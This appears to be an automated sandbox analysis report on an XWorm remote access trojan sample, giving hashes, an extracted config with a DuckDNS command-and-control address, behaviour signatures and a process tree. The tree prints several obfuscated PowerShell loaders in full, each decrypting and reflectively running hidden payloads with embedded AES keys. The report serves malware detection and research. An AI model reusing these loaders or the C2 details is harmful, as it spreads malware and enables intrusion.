xworm | 97de68611d3c350f29c3d2294b7411c55636fa2439c8c8d0fca1ef25804f99fa

Analysis

max time kernel
56s
max time network
77s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
23/04/2024, 21:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

XClientX.exe
Size

33KB
MD5

0d80ac15c3f2959cce58c9a3671144e4
SHA1

0e46bd2c0ffe1492fdf6ea16b67c8a1508ed5641
SHA256

97de68611d3c350f29c3d2294b7411c55636fa2439c8c8d0fca1ef25804f99fa
SHA512

f24c19d99c5a90985998ebb289b6888332a72d733edd84510d6677b0860fc7b8c21ca819888c357519b79b78244628b6b12e20b258b92d01994aa13501420232
SSDEEP

768:n4fK1pDGkptwyZScCBSUapNgqlDU/kZl+Bcg4tlTF59269O9hSSUR0:XDGkptwyZScCkU4rNUsZcB54HF59269W

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

jdokds.duckdns.org:8895

Mutex

fR94ukDUyBXXff7e

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1036-0-0x0000000000950000-0x000000000095E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1036	XClientX.exe
4420	powershell.exe
4420	powershell.exe
4420	powershell.exe
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
3256	powershell.exe
3256	powershell.exe
3256	powershell.exe
3256	powershell.exe
3256	powershell.exe
1036	XClientX.exe
1036	XClientX.exe
1036	XClientX.exe
1036	XClientX.exe
1188	powershell.exe
1188	powershell.exe
1188	powershell.exe
4448	powershell.exe
4448	powershell.exe
4564	powershell.exe
4564	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1036	XClientX.exe
Token: SeDebugPrivilege	4420	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1036	XClientX.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1036 wrote to memory of 2920	1036	XClientX.exe	74
PID 1036 wrote to memory of 2920	1036	XClientX.exe	74
PID 2920 wrote to memory of 4420	2920	cmd.exe	76
PID 2920 wrote to memory of 4420	2920	cmd.exe	76
PID 2920 wrote to memory of 4420	2920	cmd.exe	76
PID 1036 wrote to memory of 4508	1036	XClientX.exe	77
PID 1036 wrote to memory of 4508	1036	XClientX.exe	77
PID 4508 wrote to memory of 2968	4508	cmd.exe	79
PID 4508 wrote to memory of 2968	4508	cmd.exe	79
PID 4508 wrote to memory of 2968	4508	cmd.exe	79
PID 1036 wrote to memory of 4672	1036	XClientX.exe	80
PID 1036 wrote to memory of 4672	1036	XClientX.exe	80
PID 4672 wrote to memory of 4900	4672	cmd.exe	82
PID 4672 wrote to memory of 4900	4672	cmd.exe	82
PID 4672 wrote to memory of 2568	4672	cmd.exe	83
PID 4672 wrote to memory of 2568	4672	cmd.exe	83
PID 1036 wrote to memory of 4036	1036	XClientX.exe	85
PID 1036 wrote to memory of 4036	1036	XClientX.exe	85
PID 2568 wrote to memory of 4108	2568	cmd.exe	86
PID 2568 wrote to memory of 4108	2568	cmd.exe	86
PID 1036 wrote to memory of 360	1036	XClientX.exe	88
PID 1036 wrote to memory of 360	1036	XClientX.exe	88
PID 2568 wrote to memory of 4108	2568	cmd.exe	90
PID 2568 wrote to memory of 4108	2568	cmd.exe	90
PID 2568 wrote to memory of 3256	2568	cmd.exe	91
PID 2568 wrote to memory of 3256	2568	cmd.exe	91
PID 1036 wrote to memory of 5028	1036	XClientX.exe	92
PID 1036 wrote to memory of 5028	1036	XClientX.exe	92
PID 1036 wrote to memory of 1352	1036	XClientX.exe	94
PID 1036 wrote to memory of 1352	1036	XClientX.exe	94
PID 1036 wrote to memory of 2400	1036	XClientX.exe	96
PID 1036 wrote to memory of 2400	1036	XClientX.exe	96
PID 1036 wrote to memory of 3980	1036	XClientX.exe	98
PID 1036 wrote to memory of 3980	1036	XClientX.exe	98
PID 1036 wrote to memory of 4132	1036	XClientX.exe	100
PID 1036 wrote to memory of 4132	1036	XClientX.exe	100
PID 1036 wrote to memory of 1068	1036	XClientX.exe	102
PID 1036 wrote to memory of 1068	1036	XClientX.exe	102
PID 1036 wrote to memory of 3852	1036	XClientX.exe	104
PID 1036 wrote to memory of 3852	1036	XClientX.exe	104
PID 5028 wrote to memory of 2724	5028	cmd.exe	106
PID 5028 wrote to memory of 2724	5028	cmd.exe	106
PID 1036 wrote to memory of 168	1036	XClientX.exe	107
PID 1036 wrote to memory of 168	1036	XClientX.exe	107
PID 2400 wrote to memory of 1204	2400	cmd.exe	109
PID 2400 wrote to memory of 1204	2400	cmd.exe	109
PID 1036 wrote to memory of 5072	1036	XClientX.exe	110
PID 1036 wrote to memory of 5072	1036	XClientX.exe	110
PID 1036 wrote to memory of 4020	1036	XClientX.exe	112
PID 1036 wrote to memory of 4020	1036	XClientX.exe	112
PID 1352 wrote to memory of 4580	1352	cmd.exe	114
PID 1352 wrote to memory of 4580	1352	cmd.exe	114
PID 1036 wrote to memory of 4148	1036	XClientX.exe	154
PID 1036 wrote to memory of 4148	1036	XClientX.exe	154
PID 4132 wrote to memory of 924	4132	cmd.exe	117
PID 4132 wrote to memory of 924	4132	cmd.exe	117
PID 3980 wrote to memory of 3512	3980	cmd.exe	118
PID 3980 wrote to memory of 3512	3980	cmd.exe	118
PID 3852 wrote to memory of 2260	3852	cmd.exe	119
PID 3852 wrote to memory of 2260	3852	cmd.exe	119
PID 4148 wrote to memory of 3476	4148	cmd.exe	120
PID 4148 wrote to memory of 3476	4148	cmd.exe	120
PID 4148 wrote to memory of 216	4148	cmd.exe	121
PID 4148 wrote to memory of 216	4148	cmd.exe	121

C:\Users\Admin\AppData\Local\Temp\XClientX.exe
"C:\Users\Admin\AppData\Local\Temp\XClientX.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dxaktb.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Flmceaelwj = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dxaktb.bat' | select-object -Last 1; $Qpiedhffan = [System.Convert]::FromBase64String($Flmceaelwj);$Tlfdzhtvv = New-Object System.IO.MemoryStream( , $Qpiedhffan );$Oosvmvwadrd = New-Object System.IO.MemoryStream;$Ipxfr = New-Object System.IO.Compression.GzipStream $Tlfdzhtvv, ([IO.Compression.CompressionMode]::Decompress);$Ipxfr.CopyTo( $Oosvmvwadrd );$Ipxfr.Close();$Tlfdzhtvv.Close();[byte[]] $Qpiedhffan = $Oosvmvwadrd.ToArray();[Array]::Reverse($Qpiedhffan); $Uyqgmoqrr = [System.Threading.Thread]::GetDomain().Load($Qpiedhffan); $Premz = $Uyqgmoqrr.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\snhgmd.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4508
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\snhgmd.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pxovyw.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4672
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:4900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\pxovyw.cmd"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:4108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\pxovyw.cmd';$VRmm='SplnCjSinCjStnCjS'.Replace('nCjS', ''),'InuqRtvouqRtkeuqRt'.Replace('uqRt', ''),'ReZSqPadZSqPLiZSqPneZSqPsZSqP'.Replace('ZSqP', ''),'EiJblliJblemiJbleniJbltAtiJbl'.Replace('iJbl', ''),'LVERRoaVERRdVERR'.Replace('VERR', ''),'EntUQXMrUQXMyPoUQXMiUQXMntUQXM'.Replace('UQXM', ''),'CJHfYhJHfYanJHfYgJHfYeEJHfYxtJHfYensJHfYioJHfYnJHfY'.Replace('JHfY', ''),'CoanSepyTanSeoanSe'.Replace('anSe', ''),'CrNdnReaNdnRteNdnRDeNdnRcryNdnRpNdnRtoNdnRrNdnR'.Replace('NdnR', ''),'GNCxfetCNCxfurNCxfrNCxfenNCxftPNCxfrNCxfocNCxfesNCxfsNCxf'.Replace('NCxf', ''),'FPalXroPalXmBaPalXsPalXePalX6PalX4SPalXtriPalXngPalX'.Replace('PalX', ''),'MadHfBindHfBModHfBddHfBudHfBledHfB'.Replace('dHfB', ''),'DYCmiecYCmioYCmimpYCmirYCmiesYCmisYCmi'.Replace('YCmi', ''),'TrYknKaYknKnsfYknKorYknKmYknKFYknKinYknKaYknKlBYknKlYknKoYknKcYknKkYknK'.Replace('YknK', '');powershell -w hidden;function PLHtB($FmnQH){$wzOcA=[System.Security.Cryptography.Aes]::Create();$wzOcA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wzOcA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wzOcA.Key=[System.Convert]::($VRmm[10])('I5igM2q7wcpLQsW8OHI8JufBzcsEYmyqGSIpuZvjwls=');$wzOcA.IV=[System.Convert]::($VRmm[10])('t5Bgkn4/8gvxvD+KFBaDbg==');$NktsB=$wzOcA.($VRmm[8])();$mjxse=$NktsB.($VRmm[13])($FmnQH,0,$FmnQH.Length);$NktsB.Dispose();$wzOcA.Dispose();$mjxse;}function zidEI($FmnQH){$UmZhp=New-Object System.IO.MemoryStream(,$FmnQH);$qKKAw=New-Object System.IO.MemoryStream;$EPJLz=New-Object System.IO.Compression.GZipStream($UmZhp,[IO.Compression.CompressionMode]::($VRmm[12]));$EPJLz.($VRmm[7])($qKKAw);$EPJLz.Dispose();$UmZhp.Dispose();$qKKAw.Dispose();$qKKAw.ToArray();}$mWYgy=[System.IO.File]::($VRmm[2])([Console]::Title);$YPDWI=zidEI (PLHtB ([Convert]::($VRmm[10])([System.Linq.Enumerable]::($VRmm[3])($mWYgy, 5).Substring(2))));$MHKdT=zidEI (PLHtB ([Convert]::($VRmm[10])([System.Linq.Enumerable]::($VRmm[3])($mWYgy, 6).Substring(2))));[System.Reflection.Assembly]::($VRmm[4])([byte[]]$MHKdT).($VRmm[5]).($VRmm[1])($null,$null);[System.Reflection.Assembly]::($VRmm[4])([byte[]]$YPDWI).($VRmm[5]).($VRmm[1])($null,$null); "
      4⤵
      PID:4108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fmmifi.bat" "
  2⤵
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dxafki.cmd" "
  2⤵
  PID:360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mfhhij.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:2724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\mfhhij.cmd"
    3⤵
    PID:1628
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:1764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\mfhhij.cmd';$SwBl='TrSFEmanSFEmsfoSFEmrmFSFEminSFEmaSFEmlBSFEmloSFEmckSFEm'.Replace('SFEm', ''),'LoaOmccdOmcc'.Replace('Omcc', ''),'GonfIetConfIurronfIenonfItPronfIoonfIceonfIsonfIsonfI'.Replace('onfI', ''),'MaLlFuinMLlFuoLlFuduLlFuleLlFu'.Replace('LlFu', ''),'CoSmgbpySmgbToSmgb'.Replace('Smgb', ''),'DYBECecYBEComYBECprYBECesYBECsYBEC'.Replace('YBEC', ''),'SpgpFhlgpFhitgpFh'.Replace('gpFh', ''),'InCRwJvokCRwJeCRwJ'.Replace('CRwJ', ''),'CJvFlhaJvFlngJvFleEJvFlxteJvFlnsJvFlioJvFlnJvFl'.Replace('JvFl', ''),'EcHsQntrcHsQyPcHsQoicHsQntcHsQ'.Replace('cHsQ', ''),'FUQSBroUQSBmUQSBBasUQSBe6UQSB4StUQSBrUQSBinUQSBgUQSB'.Replace('UQSB', ''),'CNAqEreNAqEateNAqEDecNAqErypNAqEtoNAqErNAqE'.Replace('NAqE', ''),'EPqKqlPqKqemePqKqntPqKqAPqKqtPqKq'.Replace('PqKq', ''),'RVYateVYatadVYatLiVYatneVYatsVYat'.Replace('VYat', '');powershell -w hidden;function NdefN($Ecemy){$iTOVp=[System.Security.Cryptography.Aes]::Create();$iTOVp.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iTOVp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iTOVp.Key=[System.Convert]::($SwBl[10])('RLuFc+beHyp5r+s6iBRI8FscsPZUr6f1NNJwahFzGxc=');$iTOVp.IV=[System.Convert]::($SwBl[10])('TKcyQB21kdju2BI396GIXQ==');$rygjQ=$iTOVp.($SwBl[11])();$vKnFu=$rygjQ.($SwBl[0])($Ecemy,0,$Ecemy.Length);$rygjQ.Dispose();$iTOVp.Dispose();$vKnFu;}function SRNMj($Ecemy){$LgMCs=New-Object System.IO.MemoryStream(,$Ecemy);$hDisw=New-Object System.IO.MemoryStream;$LCeib=New-Object System.IO.Compression.GZipStream($LgMCs,[IO.Compression.CompressionMode]::($SwBl[5]));$LCeib.($SwBl[4])($hDisw);$LCeib.Dispose();$LgMCs.Dispose();$hDisw.Dispose();$hDisw.ToArray();}$NrHCr=[System.IO.File]::($SwBl[13])([Console]::Title);$iAEyU=SRNMj (NdefN ([Convert]::($SwBl[10])([System.Linq.Enumerable]::($SwBl[12])($NrHCr, 5).Substring(2))));$tviOX=SRNMj (NdefN ([Convert]::($SwBl[10])([System.Linq.Enumerable]::($SwBl[12])($NrHCr, 6).Substring(2))));[System.Reflection.Assembly]::($SwBl[1])([byte[]]$tviOX).($SwBl[9]).($SwBl[7])($null,$null);[System.Reflection.Assembly]::($SwBl[1])([byte[]]$iAEyU).($SwBl[9]).($SwBl[7])($null,$null); "
      4⤵
      PID:4908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xwjzda.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1352
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\xwjzda.cmd"
    3⤵
    PID:200
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:4988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\xwjzda.cmd';$VXrD='EntcCQSryPcCQSoincCQStcCQS'.Replace('cCQS', ''),'InvpTaEopTaEkepTaE'.Replace('pTaE', ''),'CoptAHAytAHATotAHA'.Replace('tAHA', ''),'GetuqgcCuqgcuruqgcrenuqgctPuqgcruqgcouqgccesuqgcsuqgc'.Replace('uqgc', ''),'LoVxfyadVxfy'.Replace('Vxfy', ''),'ChavXTbngvXTbeExvXTbtvXTbevXTbnsivXTbonvXTb'.Replace('vXTb', ''),'TraMCnJnsMCnJforMCnJmFMCnJinaMCnJlBMCnJlocMCnJkMCnJ'.Replace('MCnJ', ''),'DemSZbcomSZbmpmSZbremSZbsmSZbsmSZb'.Replace('mSZb', ''),'FoiHdrooiHdmBaoiHdseoiHd6oiHd4oiHdSoiHdtroiHdingoiHd'.Replace('oiHd', ''),'ElaRLsemeaRLsntaRLsAtaRLs'.Replace('aRLs', ''),'MaiAIfUnMAIfUoAIfUduAIfUleAIfU'.Replace('AIfU', ''),'SpZmuZlZmuZitZmuZ'.Replace('ZmuZ', ''),'CwpIpreawpIptwpIpeDewpIpcwpIprywpIpptwpIporwpIp'.Replace('wpIp', ''),'RhtvJeahtvJdLhtvJinhtvJeshtvJ'.Replace('htvJ', '');powershell -w hidden;function skJEt($cZxbn){$qEHni=[System.Security.Cryptography.Aes]::Create();$qEHni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$qEHni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$qEHni.Key=[System.Convert]::($VXrD[8])('vtiXWdHEakqeDXiUeuEIaTZz8/3+zWZxb6/fTotZMYM=');$qEHni.IV=[System.Convert]::($VXrD[8])('tiZGh9X7r/epqVUBQDbNhQ==');$BYAmd=$qEHni.($VXrD[12])();$IeRcX=$BYAmd.($VXrD[6])($cZxbn,0,$cZxbn.Length);$BYAmd.Dispose();$qEHni.Dispose();$IeRcX;}function CkIux($cZxbn){$sgHYL=New-Object System.IO.MemoryStream(,$cZxbn);$xsFwU=New-Object System.IO.MemoryStream;$nBWcY=New-Object System.IO.Compression.GZipStream($sgHYL,[IO.Compression.CompressionMode]::($VXrD[7]));$nBWcY.($VXrD[2])($xsFwU);$nBWcY.Dispose();$sgHYL.Dispose();$xsFwU.Dispose();$xsFwU.ToArray();}$DNQzA=[System.IO.File]::($VXrD[13])([Console]::Title);$vAPin=CkIux (skJEt ([Convert]::($VXrD[8])([System.Linq.Enumerable]::($VXrD[9])($DNQzA, 5).Substring(2))));$epNWu=CkIux (skJEt ([Convert]::($VXrD[8])([System.Linq.Enumerable]::($VXrD[9])($DNQzA, 6).Substring(2))));[System.Reflection.Assembly]::($VXrD[4])([byte[]]$epNWu).($VXrD[0]).($VXrD[1])($null,$null);[System.Reflection.Assembly]::($VXrD[4])([byte[]]$vAPin).($VXrD[0]).($VXrD[1])($null,$null); "
      4⤵
      PID:4672
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nmnulh.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\nmnulh.cmd"
    3⤵
    PID:4892
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:4492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\nmnulh.cmd';$vCAI='InvbxLvokvbxLevbxL'.Replace('vbxL', ''),'SpEiYBlEiYBitEiYB'.Replace('EiYB', ''),'DechHOkohHOkmhHOkphHOkrehHOksshHOk'.Replace('hHOk', ''),'EjFtKnjFtKtjFtKryPjFtKojFtKijFtKnjFtKtjFtK'.Replace('jFtK', ''),'TEymXraEymXnsfEymXorEymXmFEymXinEymXalEymXBEymXlocEymXkEymX'.Replace('EymX', ''),'CreSDhQateSDhQDSDhQecSDhQrSDhQypSDhQtSDhQoSDhQrSDhQ'.Replace('SDhQ', ''),'GetYDcUCYDcUurrYDcUentYDcUPrYDcUocYDcUesYDcUsYDcU'.Replace('YDcU', ''),'MaiMWaVnMWaVMoMWaVdMWaVuleMWaV'.Replace('MWaV', ''),'CEQIzopEQIzyEQIzToEQIz'.Replace('EQIz', ''),'Loadtupddtup'.Replace('dtup', ''),'ReabWlHdbWlHLinbWlHesbWlH'.Replace('bWlH', ''),'ElIMLLemeIMLLnIMLLtAIMLLtIMLL'.Replace('IMLL', ''),'FroSuoxmSuoxBasSuoxe64SuoxStSuoxrinSuoxgSuox'.Replace('Suox', ''),'CTuHJhTuHJanTuHJgTuHJeTuHJETuHJxteTuHJnsTuHJionTuHJ'.Replace('TuHJ', '');powershell -w hidden;function AuMBb($txMET){$vjKgu=[System.Security.Cryptography.Aes]::Create();$vjKgu.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vjKgu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vjKgu.Key=[System.Convert]::($vCAI[12])('FloHOQ4rqBkFFufNKP4aqP5Lo/+vxsqNUXZDuD5JWck=');$vjKgu.IV=[System.Convert]::($vCAI[12])('K814h/ud7isyH2J+OxwkDg==');$JMPMk=$vjKgu.($vCAI[5])();$AFeZB=$JMPMk.($vCAI[4])($txMET,0,$txMET.Length);$JMPMk.Dispose();$vjKgu.Dispose();$AFeZB;}function aOQcN($txMET){$mrHEB=New-Object System.IO.MemoryStream(,$txMET);$uJQAG=New-Object System.IO.MemoryStream;$Hokle=New-Object System.IO.Compression.GZipStream($mrHEB,[IO.Compression.CompressionMode]::($vCAI[2]));$Hokle.($vCAI[8])($uJQAG);$Hokle.Dispose();$mrHEB.Dispose();$uJQAG.Dispose();$uJQAG.ToArray();}$huyPk=[System.IO.File]::($vCAI[10])([Console]::Title);$HgSFI=aOQcN (AuMBb ([Convert]::($vCAI[12])([System.Linq.Enumerable]::($vCAI[11])($huyPk, 5).Substring(2))));$PofSZ=aOQcN (AuMBb ([Convert]::($vCAI[12])([System.Linq.Enumerable]::($vCAI[11])($huyPk, 6).Substring(2))));[System.Reflection.Assembly]::($vCAI[9])([byte[]]$PofSZ).($vCAI[3]).($vCAI[0])($null,$null);[System.Reflection.Assembly]::($vCAI[9])([byte[]]$HgSFI).($vCAI[3]).($vCAI[0])($null,$null); "
      4⤵
      PID:4100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xgguca.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3980
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:3512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\xgguca.cmd"
    3⤵
    PID:392
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:3012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\xgguca.cmd';$xmDK='EleBXvpmenBXvptABXvptBXvp'.Replace('BXvp', ''),'InBWeVvoBWeVkeBWeV'.Replace('BWeV', ''),'CpFbRhpFbRapFbRngpFbReExpFbRtepFbRnspFbRiopFbRnpFbR'.Replace('pFbR', ''),'TbtHOrbtHOabtHOnsfbtHOobtHOrmbtHOFibtHOnabtHOlbtHOBlbtHOocbtHOkbtHO'.Replace('btHO', ''),'MailryQnMolryQdlryQullryQelryQ'.Replace('lryQ', ''),'CoRIBYpyRIBYToRIBY'.Replace('RIBY', ''),'GeAxpytCAxpyurAxpyrenAxpytPAxpyrocAxpyessAxpy'.Replace('Axpy', ''),'FrTtySoTtySmBTtySaseTtyS6TtyS4TtySStTtySriTtySngTtyS'.Replace('TtyS', ''),'SpOTQllOTQlitOTQl'.Replace('OTQl', ''),'LoQqWhadQqWh'.Replace('QqWh', ''),'CrFsYGeaFsYGtFsYGeFsYGDeFsYGcrFsYGyptFsYGoFsYGrFsYG'.Replace('FsYG', ''),'DeDmydcDmydompDmydrDmydessDmyd'.Replace('Dmyd', ''),'ReBKqmaBKqmdLiBKqmneBKqmsBKqm'.Replace('BKqm', ''),'EnzpbEtrzpbEyzpbEPzpbEoizpbEntzpbE'.Replace('zpbE', '');powershell -w hidden;function qAYVb($OKqEW){$xnbnQ=[System.Security.Cryptography.Aes]::Create();$xnbnQ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xnbnQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xnbnQ.Key=[System.Convert]::($xmDK[7])('gypKDyYCpWb8a8M3HSfzhDso0XyuFAJg6GfcWDI8Pas=');$xnbnQ.IV=[System.Convert]::($xmDK[7])('Xa5ENsnVF+KMfOsHe2uvWQ==');$wZUmW=$xnbnQ.($xmDK[10])();$jdzXD=$wZUmW.($xmDK[3])($OKqEW,0,$OKqEW.Length);$wZUmW.Dispose();$xnbnQ.Dispose();$jdzXD;}function yKCQY($OKqEW){$yCPCR=New-Object System.IO.MemoryStream(,$OKqEW);$vlFnY=New-Object System.IO.MemoryStream;$shbAw=New-Object System.IO.Compression.GZipStream($yCPCR,[IO.Compression.CompressionMode]::($xmDK[11]));$shbAw.($xmDK[5])($vlFnY);$shbAw.Dispose();$yCPCR.Dispose();$vlFnY.Dispose();$vlFnY.ToArray();}$aNMCe=[System.IO.File]::($xmDK[12])([Console]::Title);$QATLw=yKCQY (qAYVb ([Convert]::($xmDK[7])([System.Linq.Enumerable]::($xmDK[0])($aNMCe, 5).Substring(2))));$OXzdx=yKCQY (qAYVb ([Convert]::($xmDK[7])([System.Linq.Enumerable]::($xmDK[0])($aNMCe, 6).Substring(2))));[System.Reflection.Assembly]::($xmDK[9])([byte[]]$OXzdx).($xmDK[13]).($xmDK[1])($null,$null);[System.Reflection.Assembly]::($xmDK[9])([byte[]]$QATLw).($xmDK[13]).($xmDK[1])($null,$null); "
      4⤵
      PID:356
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rvsrgv.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4132
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\rvsrgv.cmd"
    3⤵
    PID:1172
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:600
  - - C:\Windows\system32\cmd.exe
